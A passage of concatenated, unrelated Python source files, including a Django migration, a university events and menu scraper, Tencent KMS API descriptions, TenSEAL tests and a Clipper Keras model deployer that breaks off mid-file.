plt.setp(ax.get_xticklabels(), rotation=60, horizontalalignment='right') plt.title("Statistics of programming languages in Poland 2019") plt.ylabel("Number of pople") plt.savefig('Stats_2019.jpg', format = 'jpg') plt.tight_layout() plt.show() # -*- coding: utf-8 -*- # Generated by Django 1.11.5 on 2018-07-03 02:01 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Category', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('picture', models.URLField(default='')), ('name', models.CharField(max_length=32)), ('code', models.CharField(default='', max_length=16)), ('description', models.CharField(max_length=1024)), ('creation_date', models.DateField()), ('active', models.BooleanField(default=True)), ('creator', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='Command', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=32)), ('code', models.CharField(default='', max_length=16)), ('programming_language', models.CharField(max_length=32)), ('description', models.CharField(max_length=1024)), ('definition', models.CharField(max_length=8192)), ('script_url', models.CharField(max_length=128)), ('creation_date', models.DateField()), ('active', models.BooleanField(default=True)), ('categories', models.ManyToManyField(to='library.Category')), ('creator', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='Module', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('picture', models.URLField(default='')), ('name', models.CharField(max_length=32)), ('code', models.CharField(default='', max_length=16)), ('description', models.CharField(max_length=1024)), ('active', models.BooleanField(default=True)), ('creator', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='Profession', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('picture', models.URLField(default='')), ('name', models.CharField(max_length=32)), ('code', models.CharField(default='', max_length=16)), ('description', models.CharField(max_length=1024)), ('creation_date', models.DateField()), ('active', models.BooleanField(default=True)), ('creator', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='module', name='professions', field=models.ManyToManyField(to='library.Profession'), ), migrations.AddField( model_name='command', name='module', field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='library.Module'), ), ] from lib.scraping.wesleying import wesleying from lib.scraping.wesleyanEvents import wesleyanEvents from lib.scraping.wesleyanMenus import usdanMenus # from lib.scraping.filmSeries import film_series from lib.db import db import time import datetime import sys # Controls, set to false and add in/check conditionals below to skip. SCRAPE_WESLEYING = True SCRAPE_WESLEYAN_EVENTS = True SCRAPE_USDAN = True STATIC_MENUS = True STATIC_FILM_SERIES = True STATIC_DIRECTORY = True # For now, everything will be scraped every 10 minutes. # TODO: Implement smarter timing system so that things # like events are scraped often, menus scraped daily, # and film series, wesmaps, hours, etc. scraped only # once a day or week or even only on specific days or # times. SLEEP_TIME = 600 def initialize(clear=True): if clear: clear_all_sources() curr_time = datetime.datetime.now() result1 = populate_static_menus() result2 = populate_static_directory() result3 = populate_static_filmseries() # really only need to update the directory here since # menus will be updated right after. # These static items really shouldn't fail... status = {"menus": None, "directory": None, "film_series": None} if result1: status["menus"] = curr_time if result2: status["directory"] = curr_time if result3: status["film_series"] = curr_time print status db.update_status(status) scrape_all_sources(continuous=True) def scrape_all_sources(continuous=True): """ Calls all of the scraping methods from all of the scraping sources imported above. TODO: Multi-threading """ proceed = True while proceed: print "SCRAPER: Scraping all sources" print "SCRAPER: Scraping Wesleying" result1 = scrape_wesleying() print "SCRAPER: Scraping Wesleyan Events" result2 = scrape_wesleyan_events() events_time = datetime.datetime.now() print "SCRAPER: Scraping Usdan Menus" result3 = scrape_usdan_menus() menus_time = datetime.datetime.now() # status: if None, failed to update, will be # noted as an offline API until it works. Otherwise, # last updated time will update to time given as value. status = {"events": None, "menus": None} if result1 and result2: status["events"] = events_time if result3: status["menus"] = menus_time print status db.update_status(status) if not result1 and result2 and result3: print "SCRAPER: ERROR, UNABLE TO SCRAPE ALL SOURCES" continue # TODO: Update status db print "SCRAPER: Successfully scraped all sources at:", datetime.datetime.today() if not continuous: proceed = False else: print "SCRAPER: Waiting..." time.sleep(SLEEP_TIME) def clear_all_sources(): """ Drop. """ result1 = db.remove_all_events() result2 = db.remove_all_menus() result3 = db.remove_all_filmseries() result4 = db.remove_directory_entries() if not result1 and result2 and result3 and result4: print "SCRAPER: Unable to clear all sources" return False return True def clear_wesleying(): if not db.remove_events_by_source("Wesleying"): print "SCRAPER: Unable to clear Wesleying db" return False return True def clear_wesleyan_events(): if not db.remove_events_by_source("Wesleyan Events"): print "SCRAPER:Unable to clear Wesleyan Events" return False return True def scrape_wesleying(): # scrape Wesleying if not SCRAPE_WESLEYING: return True try: wesleying_results = wesleying.scrape_wesleying() except: print "SCRAPER: Unable to scrape wesleying" return False # add to db for res in wesleying_results: add_result = db.add_event(res) if not add_result: print "AHH COULND'T ADD" return True def scrape_wesleyan_events(): # scrape Wesleyan Events if not SCRAPE_WESLEYAN_EVENTS: return True try: wesleyan_events_results = wesleyanEvents.scrape_wesleyan_events() except: print "SCRAPER: Unable to scrape Weleyan Events" return False # add to db for res in wesleyan_events_results: add_result = db.add_event(res) if not add_result: print "SCRAPER: Unable to add Wesleyan events to db" return True def scrape_usdan_menus(): # scrape Wesleyan Menus if not SCRAPE_USDAN: return True try: usdan_results = usdanMenus.fetch_all() except: print "SCRAPER: Unable to scrape usdan menus" return False usdan_items = usdan_results.get('Usdan') if not usdan_items: print "SCRAPER: No usdan items from fetch" return True for item in usdan_items: result = db.add_usdan_day(item) if not result: print "SCRAPER:", item, "failed to add to db" return True def populate_static_directory(): if not STATIC_DIRECTORY: return True try: if db.populate_static_directory(): return True else: return False except: print "SCRAPER: Unable to populate static directory" return False def populate_static_menus(): if not STATIC_MENUS: return True try: if db.populate_static_menus(): return True else: return False except: print "SCRAPER: Unable to populate static menus" return False def populate_static_filmseries(): if not STATIC_FILM_SERIES: return True try: if db.populate_static_filmseries(): return True else: return False except: print "SCRAPER: Unable to populate static filmseries" return False def remove_all_filmseries(): if not db.remove_all_filmseries(): print "SCRAPER: Unable to remove all film series" return False return True about = ( "Options: 'init' to initialize without clearing db," " 'init-clear' to clear and initialize, 'rm' to clear db, " " 'once' to scrape once, 'continuous' to scrape forever.") # cmd line args if __name__ == "__main__": if len(sys.argv) > 1: if sys.argv[1] == 'init': initialize(clear=False) elif sys.argv[1] == 'init-clear': initialize(clear=True) elif sys.argv[1] == 'rm': clear_all_sources() elif sys.argv[1] == 'once': scrape_all_sources(continuous=False) elif sys.argv[1] == 'continuous': scrape_all_sources(continuous=True) else: print about else: print about import inspect from functools import partial from typing import Sequence import jax.numpy as jnp from jax import jit from onnx_jax.handlers.backend_handler import BackendHandler from onnx_jax.handlers.handler import onnx_op from onnx_jax.pb_wrapper import OnnxNode @onnx_op("Compress") class Compress(BackendHandler): @classmethod def _common(cls, node: OnnxNode, **kwargs): cls._rewrite(node) cls._prepare(node) def _compress(x, condition, axis=None): cond = tuple(list(condition.astype(jnp.int32))) return onnx_compress(x, cond, axis) return _compress @classmethod def version_9(cls, node, **kwargs): return cls._common(node, **kwargs) @classmethod def version_11(cls, node, **kwargs): return cls._common(node, **kwargs) @classmethod def _rewrite(cls, node: OnnxNode): if 'axis' not in node.attrs: node.attrs['axis'] = None else: axis = node.attrs.get('axis') if isinstance(axis, Sequence): node.attrs['axis'] = tuple(axis) @classmethod def _prepare(cls, node: OnnxNode): args = list(inspect.signature(onnx_compress).parameters.keys()) attrs = [node.attrs.get(k, None) for k in args[node.len_inputs :]] node.attrs_list.extend(attrs) # TODO jit support # @partial(jit, static_argnums=(1, 2)) def onnx_compress(x, condition, axis=None): y = jnp.compress(condition, x, axis) return y # -*- coding: utf-8 -*- DESC = "kms-2019-01-18" INFO = { "Encrypt": { "params": [ { "name": "KeyId", "desc": "调用CreateKey生成的CMK全局唯一标识符" }, { "name": "Plaintext", "desc": "被加密的明文数据,该字段必须使用base64编码,原文最大长度支持4K" }, { "name": "EncryptionContext", "desc": "key/value对的json字符串,如果指定了该参数,则在调用Decrypt API时需要提供同样的参数,最大支持1024个字符" } ], "desc": "本接口用于加密最多为4KB任意数据,可用于加密数据库密码,RSA Key,或其它较小的敏感信息。对于应用的数据加密,使用GenerateDataKey生成的DataKey进行本地数据的加解密操作" }, "Decrypt": { "params": [ { "name": "CiphertextBlob", "desc": "待解密的密文数据" }, { "name": "EncryptionContext", "desc": "key/value对的json字符串,如果Encrypt指定了该参数,则在调用Decrypt API时需要提供同样的参数,最大支持1024字符" } ], "desc": "本接口用于解密密文,得到明文数据。" }, "UpdateAlias": { "params": [ { "name": "Alias", "desc": "新的别名,1-60个字符或数字的组合" }, { "name": "KeyId", "desc": "CMK的全局唯一标识符" } ], "desc": "用于修改CMK的别名。对于处于PendingDelete状态的CMK禁止修改。" }, "ImportKeyMaterial": { "params": [ { "name": "EncryptedKeyMaterial", "desc": "使用GetParametersForImport 返回的PublicKey加密后的密钥材料base64编码。对于国密版本region的KMS,导入的密钥材料长度要求为 128 bit,FIPS版本region的KMS, 导入的密钥材料长度要求为 256 bit。" }, { "name": "ImportToken", "desc": "通过调用GetParametersForImport获得的导入令牌。" }, { "name": "KeyId", "desc": "指定导入密钥材料的CMK,需要和GetParametersForImport 指定的CMK相同。" }, { "name": "ValidTo", "desc": "密钥材料过期时间 unix 时间戳,不指定或者 0 表示密钥材料不会过期,若指定过期时间,需要大于当前时间点,最大支持 2147443200。" } ], "desc": "用于导入密钥材料。只有类型为EXTERNAL 的CMK 才可以导入,导入的密钥材料使用 GetParametersForImport 获取的密钥进行加密。可以为指定的 CMK 重新导入密钥材料,并重新指定过期时间,但必须导入相同的密钥材料。CMK 密钥材料导入后不可以更换密钥材料。导入的密钥材料过期或者被删除后,指定的CMK将无法使用,需要再次导入相同的密钥材料才能正常使用。CMK是独立的,同样的密钥材料可导入不同的 CMK 中,但使用其中一个 CMK 加密的数据无法使用另一个 CMK解密。\n只有Enabled 和 PendingImport状态的CMK可以导入密钥材料。" }, "GetPublicKey": { "params": [ { "name": "KeyId", "desc": "CMK的唯一标识。" } ], "desc": "该接口用户获取 KeyUsage为ASYMMETRIC_DECRYPT_RSA_2048 和 ASYMMETRIC_DECRYPT_SM2 的非对称密钥的公钥信息,使用该公钥用户可在本地进行数据加密,使用该公钥加密的数据只能通过KMS使用对应的私钥进行解密。只有处于Enabled状态的非对称密钥才可能获取公钥。" }, "DisableKey": { "params": [ { "name": "KeyId", "desc": "CMK唯一标识符" } ], "desc": "本接口用于禁用一个主密钥,处于禁用状态的Key无法用于加密、解密操作。" }, "GenerateDataKey": { "params": [ { "name": "KeyId", "desc": "CMK全局唯一标识符" }, { "name": "KeySpec", "desc": "指定生成Datakey的加密算法以及Datakey大小,AES_128或者AES_256。KeySpec 和 NumberOfBytes 必须指定一个" }, { "name": "NumberOfBytes", "desc": "生成的DataKey的长度,同时指定NumberOfBytes和KeySpec时,以NumberOfBytes为准。最小值为1, 最大值为1024。KeySpec 和 NumberOfBytes 必须指定一个" }, { "name": "EncryptionContext", "desc": "key/value对的json字符串,如果使用该字段,则返回的DataKey在解密时需要填入相同的字符串" } ], "desc": "本接口生成一个数据密钥,您可以用这个密钥进行本地数据的加密。" }, "AsymmetricSm2Decrypt": { "params": [ { "name": "KeyId", "desc": "CMK的唯一标识" }, { "name": "Ciphertext", "desc": "使用PublicKey加密的密文,Base64编码。密文长度不能超过256字节。" } ], "desc": "使用指定的SM2非对称密钥的私钥进行数据解密,密文必须是使用对应公钥加密的。处于Enabled 状态的非对称密钥才能进行解密操作。传入的密文的长度不能超过256字节。" }, "CancelKeyDeletion": { "params": [ { "name": "KeyId", "desc": "需要被取消删除的CMK的唯一标志" } ], "desc": "取消CMK的计划删除操作" }, "GetKeyRotationStatus": { "params": [ { "name": "KeyId", "desc": "CMK唯一标识符" } ], "desc": "查询指定的CMK是否开启了密钥轮换功能。" }, "DisableKeys": { "params": [ { "name": "KeyIds", "desc": "需要批量禁用的CMK Id 列表,CMK数量最大支持100" } ], "desc": "该接口用于批量禁止CMK的使用。" }, "ListAlgorithms": { "params": [], "desc": "列出当前Region支持的加密方式" }, "DescribeKey": { "params": [ { "name": "KeyId", "desc": "CMK全局唯一标识符" } ], "desc": "用于获取指定KeyId的主密钥属性详情信息。" }, "ListKeys": { "params": [ { "name": "Offset", "desc": "含义跟 SQL 查询的 Offset 一致,表示本次获取从按一定顺序排列数组的第 Offset 个元素开始,缺省为0" }, { "name": "Limit", "desc": "含义跟 SQL 查询的 Limit 一致,表示本次获最多获取 Limit 个元素。缺省值为10,最大值为200" }, { "name": "Role", "desc": "根据创建者角色筛选,默认 0 表示用户自己创建的cmk, 1 表示授权其它云产品自动创建的cmk" } ], "desc": "列出账号下面状态为Enabled, Disabled 和 PendingImport 的CMK KeyId 列表" }, "GenerateRandom": { "params": [ { "name": "NumberOfBytes", "desc": "生成的随机数的长度。最小值为1, 最大值为1024。" } ], "desc": "随机数生成接口。" }, "CreateKey": { "params": [ { "name": "Alias", "desc": "作为密钥更容易辨识,更容易被人看懂的别名, 不可为空,1-60个字母数字 - _ 的组合,首字符必须为字母或者数字。以 kms- 作为前缀的用于云产品使用,Alias 不可重复。" }, { "name": "Description", "desc": "CMK 的描述,最大1024字节" }, { "name": "KeyUsage", "desc": "指定key的用途,默认为 \"ENCRYPT_DECRYPT\" 表示创建对称加解密密钥,其它支持用途 “ASYMMETRIC_DECRYPT_RSA_2048” 表示创建用于加解密的RSA2048非对称密钥,“ASYMMETRIC_DECRYPT_SM2” 表示创建用于加解密的SM2非对称密钥" }, { "name": "Type", "desc": "指定key类型,默认为1,1表示默认类型,由KMS创建CMK密钥,2 表示EXTERNAL 类型,该类型需要用户导入密钥材料,参考 GetParametersForImport 和 ImportKeyMaterial 接口" } ], "desc": "创建用户管理数据密钥的主密钥CMK(Custom Master Key)。" }, "GetParametersForImport": { "params": [ { "name": "KeyId", "desc": "CMK的唯一标识,获取密钥参数的CMK必须是EXTERNAL类型,即在CreateKey时指定Type=2 类型的CMK。" }, { "name": "WrappingAlgorithm", "desc": "指定加密密钥材料的算法,目前支持RSAES_PKCS1_V1_5、RSAES_OAEP_SHA_1、RSAES_OAEP_SHA_256" }, { "name": "WrappingKeySpec", "desc": "指定加密密钥材料的类型,目前只支持RSA_2048" } ], "desc": "获取导入主密钥(CMK)材料的参数,返回的Token作为执行ImportKeyMaterial的参数之一,返回的PublicKey用于对自主导入密钥材料进行加密。返回的Token和PublicKey 24小时后失效,失效后如需重新导入,需要再次调用该接口获取新的Token和PublicKey。" }, "ListKeyDetail": { "params": [ { "name": "Offset", "desc": "含义跟 SQL 查询的 Offset 一致,表示本次获取从按一定顺序排列数组的第 Offset 个元素开始,缺省为0" }, { "name": "Limit", "desc": "含义跟 SQL 查询的 Limit 一致,表示本次最多获取 Limit 个元素。缺省值为10,最大值为200" }, { "name": "Role", "desc": "根据创建者角色筛选,默认 0 表示用户自己创建的cmk, 1 表示授权其它云产品自动创建的cmk" }, { "name": "OrderType", "desc": "根据CMK创建时间排序, 0 表示按照降序排序,1表示按照升序排序" }, { "name": "KeyState", "desc": "根据CMK状态筛选, 0表示全部CMK, 1 表示仅查询Enabled CMK, 2 表示仅查询Disabled CMK,3 表示查询PendingDelete 状态的CMK(处于计划删除状态的Key),4 表示查询 PendingImport 状态的CMK" }, { "name": "SearchKeyAlias", "desc": "根据KeyId或者Alias进行模糊匹配查询" }, { "name": "Origin", "desc": "根据CMK类型筛选, \"TENCENT_KMS\" 表示筛选密钥材料由KMS创建的CMK, \"EXTERNAL\" 表示筛选密钥材料需要用户导入的 EXTERNAL类型CMK,\"ALL\" 或者不设置表示两种类型都查询,大小写敏感。" }, { "name": "KeyUsage", "desc": "根据CMK的KeyUsage筛选,ALL表示筛选全部,可使用的参数为:ALL 或 ENCRYPT_DECRYPT 或 ASYMMETRIC_DECRYPT_RSA_2048 或 ASYMMETRIC_DECRYPT_SM2,为空则默认筛选ENCRYPT_DECRYPT类型" } ], "desc": "根据指定Offset和Limit获取主密钥列表详情。" }, "AsymmetricRsaDecrypt": { "params": [ { "name": "KeyId", "desc": "CMK的唯一标识" }, { "name": "Ciphertext", "desc": "使用PublicKey加密的密文,Base64编码" }, { "name": "Algorithm", "desc": "在使用公钥加密时对应的算法:当前支持RSAES_PKCS1_V1_5、RSAES_OAEP_SHA_1、RSAES_OAEP_SHA_256" } ], "desc": "使用指定的RSA非对称密钥的私钥进行数据解密,密文必须是使用对应公钥加密的。处于Enabled 状态的非对称密钥才能进行解密操作。" }, "DisableKeyRotation": { "params": [ { "name": "KeyId", "desc": "CMK唯一标识符" } ], "desc": "对指定的CMK禁止密钥轮换功能。" }, "EnableKeys": { "params": [ { "name": "KeyIds", "desc": "需要批量启用的CMK Id 列表, CMK数量最大支持100" } ], "desc": "该接口用于批量启用CMK。" }, "ScheduleKeyDeletion": { "params": [ { "name": "KeyId", "desc": "CMK的唯一标志" }, { "name": "PendingWindowInDays", "desc": "计划删除时间区间[7,30]" } ], "desc": "CMK计划删除接口,用于指定CMK删除的时间,可选时间区间为[7,30]天" }, "ReEncrypt": { "params": [ { "name": "CiphertextBlob", "desc": "需要重新加密的密文" }, { "name": "DestinationKeyId", "desc": "重新加密使用的CMK,如果为空,则使用密文原有的CMK重新加密(若密钥没有轮换则密文不会刷新)" }, { "name": "SourceEncryptionContext", "desc": "CiphertextBlob 密文加密时使用的key/value对的json字符串。如果加密时未使用,则为空" }, { "name": "DestinationEncryptionContext", "desc": "重新加密使用的key/value对的json字符串,如果使用该字段,则返回的新密文在解密时需要填入相同的字符串" } ], "desc": "使用指定CMK对密文重新加密。" }, "EnableKeyRotation": { "params": [ { "name": "KeyId", "desc": "CMK唯一标识符" } ], "desc": "对指定的CMK开启密钥轮换功能。" }, "EnableKey": { "params": [ { "name": "KeyId", "desc": "CMK唯一标识符" } ], "desc": "用于启用一个指定的CMK。" }, "DeleteImportedKeyMaterial": { "params": [ { "name": "KeyId", "desc": "指定需要删除密钥材料的EXTERNAL CMK。" } ], "desc": "用于删除导入的密钥材料,仅对EXTERNAL类型的CMK有效,该接口将CMK设置为PendingImport 状态,并不会删除CMK,在重新进行密钥导入后可继续使用。彻底删除CMK请使用 ScheduleKeyDeletion 接口。" }, "DescribeKeys": { "params": [ { "name": "KeyIds", "desc": "查询CMK的ID列表,批量查询一次最多支持100个KeyId" } ], "desc": "该接口用于批量获取主密钥属性信息。" }, "UpdateKeyDescription": { "params": [ { "name": "Description", "desc": "新的描述信息,最大支持1024字节" }, { "name": "KeyId", "desc": "需要修改描述信息的CMK ID" } ], "desc": "该接口用于对指定的cmk修改描述信息。对于处于PendingDelete状态的CMK禁止修改。" }, "GetServiceStatus": { "params": [], "desc": "用于查询该用户是否已开通KMS服务" } }<reponame>posguy99/comp644-fall2020<gh_stars>0 # python lab 5 10-6-20 # l5_3 60 ^ 14 (exclusive or) def print_padded_byte(b): print(bin(b)[2:].rjust(8, '0')) print_padded_byte(60) print_padded_byte(14) print(60 ^ 14) <gh_stars>0 import sys import os K = 5 def main(): cos_dist = [] for i in range(start, end+1): path = "result/data" + str(i) + "/figure/" files = os.listdir(path) files_dir = [f for f in files if os.path.isdir(os.path.join(path, f))] file_name = files_dir[0] k = int(file_name[:file_name.index("_")]) if(k == 10): result_path = path + str(k) + "_signature/" cos_file = result_path + "minimum_cos.txt" lines = open(cos_file, "r").readlines() for line in lines: cos_dist.append(float(line)) mean_val = sum(cos_dist)/len(cos_dist) print("PLDA: " + str(mean_val)) if __name__ == "__main__": args = sys.argv start = int(args[1]) end = int(args[2]) main() import math import torch import pylab as plt # Our classes. from CNNScan.Ballot import BallotDefinitions, MarkedBallots # Determine if cuda is available on the machine def cuda(arr, config): if config['cuda']: return arr.cuda() return arr # Determine the size of a dimension after applying a pool / convolutional layer. def resize_convolution(x, kernel_size, dilation, stride, padding): x = int(1 + (x + 2*padding - dilation * (kernel_size - 1) - 1)/stride) return x # Determine the size of a dimension after applying a transposed convolution layer. def resize_transpose_convolution(x, kernel_size, dilation, stride, padding, output_padding): t1 = (x-1)*stride t2 = 2*padding t3 = dilation*(kernel_size-1) t4 = output_padding return t1 - t2 + t3 + t4 + 1 # Determine if a number is a power of 2 or not and the number is non-zero. def is_power2(number): return number > 0 and math.ceil(math.log(number, 2)) == math.floor(math.log(number, 2)) # Return the next power of two larger than number, and the number of indices needed padding above and below the number. def pad_nearest_pow2(number, at_least_this=1): next_pow2 = number pad_first, pad_second = 0,0 if not is_power2(number) or number < at_least_this: next_pow2 = 2**math.ceil(math.log(number, 2)) if next_pow2 < at_least_this: next_pow2 = at_least_this needed_padding = next_pow2 - number pad_first = needed_padding // 2 pad_second = needed_padding - pad_first return (next_pow2, pad_first, pad_second) # Convert images to tensors, and apply normalization if necessary def image_to_tensor(image): #TODO: apply image normalization. return torch.from_numpy(image) # Visualize marked ballots. def show_ballot(ballot:BallotDefinitions.Ballot, marked:MarkedBallots.MarkedBallot): count = len(marked.marked_contest) fig = plt.figure() for i, contest in enumerate(marked.marked_contest): ax = fig.add_subplot( math.ceil(count/5),5, i+1) ax.set_title(f'Contest {contest.index}') ax.set_xlabel(f'Vote for {contest.actual_vote_index}. Recorded as {contest.computed_vote_index}') ax.imshow(contest.image, interpolation='nearest') plt.show() def labels_to_vec(labels, length): ret = [0]*length for label in labels: ret[label] = 1 return ret import os from setuptools import setup, find_packages def read(fname): return open(os.path.join(os.path.dirname(__file__), fname)).read() long_description = read('README.md') if os.path.isfile("README.md") else "" setup( name='bitcoin-etl', version='1.2.0', author='<NAME>', author_email='<EMAIL>', description='Tools for exporting Bitcoin blockchain data to JSON', long_description=long_description, long_description_content_type='text/markdown', url='https://github.com/blockchain-etl/bitcoin-etl', packages=find_packages(exclude=['tests']), classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7' ], keywords='bitcoin', python_requires='>=3.5.0,<3.8.0', install_requires=[ 'requests==2.20.0', 'python-dateutil==2.7.0', 'click==7.0' ], extras_require={ 'streaming': [ 'google-cloud-pubsub==0.39.1' ], 'dev': [ 'pytest~=4.3.0', 'pytest-timeout~=1.3.3' ], }, entry_points={ 'console_scripts': [ 'bitcoinetl=bitcoinetl.cli:cli', ], }, project_urls={ 'Bug Reports': 'https://github.com/blockchain-etl/bitcoin-etl/issues', 'Chat': 'https://gitter.im/ethereum-etl/Lobby', 'Source': 'https://github.com/blockchain-etl/bitcoin-etl', }, ) import tenseal as ts import numpy as np import pytest def test_context_make_public_crash(): poly_mod_degree = 8192 coeff_mod_bit_sizes = [40, 21, 21, 21, 21, 21, 21, 40] ctx = ts.context(ts.SCHEME_TYPE.CKKS, poly_mod_degree, -1, coeff_mod_bit_sizes) ctx.global_scale = 2 ** 21 ctx.generate_galois_keys() ctx_copy = ctx.copy() ctx_copy.make_context_public() ser_ctx = ctx_copy.serialize() def test_ckks_vector_matmul_exception(): context = ts.context( ts.SCHEME_TYPE.CKKS, poly_modulus_degree=16384, coeff_mod_bit_sizes=[60, 40, 40, 40, 60] ) context.generate_galois_keys() context.global_scale = 2 ** 40 x = np.random.rand(10) crypt_x = ts.ckks_vector(context, x) w = np.random.rand(10, 10) crypt_y = crypt_x.matmul(w) crypt_z = crypt_y.polyval([0.5, 0.197, 0, -0.004]) with pytest.raises(ValueError) as exc_info: output = crypt_z.matmul(w) assert "scale out of bounds" in str(exc_info) ### tensorflow==2.3.0 import tensorflow as tf import coremltools as ct mlmodel = ct.convert('saved_model_256x256', source='tensorflow') mlmodel.save("bisenetv2_cityscapes_256x256_float32.mlmodel") mlmodel = ct.convert('saved_model_480x640', source='tensorflow') mlmodel.save("bisenetv2_cityscapes_480x640_float32.mlmodel") mlmodel = ct.convert('saved_model_512x1024', source='tensorflow') mlmodel.save("bisenetv2_cityscapes_512x1024_float32.mlmodel") <filename>clipper_admin/clipper_admin/deployers/keras.py from __future__ import print_function, with_statement, absolute_import import shutil import keras import logging import os import sys from ..version import __version__, __registry__ from .deployer_utils import save_python_function from ..exceptions import ClipperException logger = logging.getLogger(__name__) def create_endpoint(clipper_conn, name, input_type, func, model_path_or_object, default_output="None", version=1, slo_micros=3000000, labels=None, registry=None, base_image="default", num_replicas=1, batch_size=-1, pkgs_to_install=None): """Registers an app and deploys the provided predict function with Keras model as a Clipper model. Parameters ---------- clipper_conn : :py:meth:`clipper_admin.ClipperConnection` A ``ClipperConnection`` object connected to a running Clipper cluster. name : str The name to be assigned to both the registered application and deployed model. input_type : str The input_type to be associated with the registered app and deployed model. One of "integers", "floats", "doubles", "bytes", or "strings". func : function The prediction function. Any state associated with the function will be captured via closure capture and pickled with Cloudpickle. model_path_or_object : keras Model object or a path to a saved Model ('.h5') default_output : str, optional The default output for the application. The default output will be returned whenever an application is unable to receive a response from a model within the specified query latency SLO (service level objective). The reason the default output was returned is always provided as part of the prediction response object. Defaults to "None". version : str, optional The version to assign this model. Versions must be unique on a per-model basis, but may be re-used across different models. slo_micros : int, optional The query latency objective for the application in microseconds. This is the processing latency between Clipper receiving a request and sending a response. It does not account for network latencies before a request is received or after a response is sent. If Clipper cannot process a query within the latency objective, the default output is returned. Therefore, it is recommended that the SLO not be set aggressively low unless absolutely necessary. 100000 (100ms) is a good starting value, but the optimal latency objective will vary depending on the application. labels : list(str), optional A list of strings annotating the model. These are ignored by Clipper and used purely for user annotations. registry : str, optional The Docker container registry to push the freshly built model to. Note that if you are running Clipper on Kubernetes, this registry must be accesible to the Kubernetes cluster in order to fetch the container from the registry. base_image : str, optional The base Docker image to build the new model image from. This image should contain all code necessary to run a Clipper model container RPC client. num_replicas : int, optional The number of replicas of the model to create. The number of replicas for a model can be changed at any time with :py:meth:`clipper.ClipperConnection.set_num_replicas`. batch_size : int, optional The user-defined query batch size for the model. Replicas of the model will attempt to process at most `batch_size` queries simultaneously. They may process smaller batches if `batch_size` queries are not immediately available. If the default value of -1 is used, Clipper will adaptively calculate the batch size for individual replicas of this model. pkgs_to_install : list (of strings), optional A list of the names of packages to install, using pip, in the container. The names must be strings. """ clipper_conn.register_application(name, input_type, default_output, slo_micros) deploy_keras_model(clipper_conn, name, version, input_type, func, model_path_or_object, base_image, labels, registry, num_replicas, batch_size, pkgs_to_install) clipper_conn.link_model_to_app(name, name) def deploy_keras_model(clipper_conn, name, version, input_type, func, model_path_or_object, base_image="default", labels=None, registry=None, num_replicas=1, batch_size=-1, pkgs_to_install=None): """Deploy a Python prediction function with a Keras Model object or model file ('.h5'). Parameters ---------- clipper_conn : :py:meth:`clipper_admin.ClipperConnection` A ``ClipperConnection`` object connected to a running Clipper cluster. name : str The name to be assigned to both the registered application and deployed model. version : str The version to assign this model. Versions must be unique on a per-model basis, but may be re-used across different models. input_type : str The input_type to be associated with the registered app and deployed model. One of "integers", "floats", "doubles", "bytes", or "strings". func : function The prediction function. Any state associated with the function will be captured via closure capture and pickled with Cloudpickle. model_path_or_object : keras Model object or a path to a saved Model ('.h5') base_image : str, optional The base Docker image to build the new model image from. This image should contain all code necessary to run a Clipper model container RPC client. labels : list(str), optional A list of strings annotating the model. These are ignored by Clipper and used purely for user annotations. registry : str, optional The Docker container registry to push the freshly built model to. Note that if you are running Clipper on Kubernetes, this registry must be accesible to the Kubernetes cluster in order to fetch the container from the registry. num_replicas : int, optional The number of replicas of the model to create. The number of replicas for a model can be changed at any time with :py:meth:`clipper.ClipperConnection.set_num_replicas`. batch_size : int, optional The user-defined query batch size for the model. Replicas of the model will attempt to process at most `batch_size` queries simultaneously. They may process smaller batches if `batch_size` queries are not immediately available. If the default value of -1 is used, Clipper will adaptively calculate the batch size for individual replicas of this model. pkgs_to_install : list (of strings), optional A list of the names of packages to install, using pip, in the container. The names must be strings. Example ------- Deploy a Keras Model:: from clipper_admin import ClipperConnection, DockerContainerManager from clipper_admin.deployers import keras as keras_deployer import keras # creating a simple Keras model inpt = keras.layers.Input(shape=(1,)) out = keras.layers.multiply([inpt, inpt]) model = keras.models.Model(inputs=inpt, outputs=out) clipper_conn = ClipperConnection(DockerContainerManager()) # Connect to an already-running Clipper cluster clipper_conn.connect() def predict(model, inputs): return [model.predict(x) for x in inputs] keras_deployer.deploy_keras_model(clipper_conn=clipper_conn, name="pow", version="1", input_type="ints", func=predict, model_path_or_object=model, base_image='keras-container') # sending an inference request import requests import json req_json = json.dumps({ "input": [1, 2, 4, 6] }) headers = {"Content-type": "application/json"} response = requests.post("http://localhost:1337/keras-pow/predict", headers=headers, data=req_json) """ # save predict function serialization_dir = save_python_function(name, func) # save Keras model or copy the saved model into the image if isinstance(model_path_or_object, keras.Model): model_path_or_object.save(os.path.join(serialization_dir, "keras_model.h5")) elif os.path.isfile(model_path_or_object): try: shutil.copy(model_path_or_object, os.path.join(serialization_dir, "keras_model.h5")) except Exception as e: logger.error("Error copying keras model: %s" % e) raise e else: raise ClipperException( "%s should be wither a Keras Model object or a saved Model ('.h5')" % model_path_or_object) py_minor_version = (sys.version_info.major, sys.version_info.minor) # Check if Python 2 or Python 3 image if base_image == "default": if py_minor_version < (3, 0): logger.info("Using Python 2 base image") base_image = "{}/keras-container:{}".format( __registry__, __version__) elif py_minor_version == (3, 5): logger.info("Using Python 3.5 base 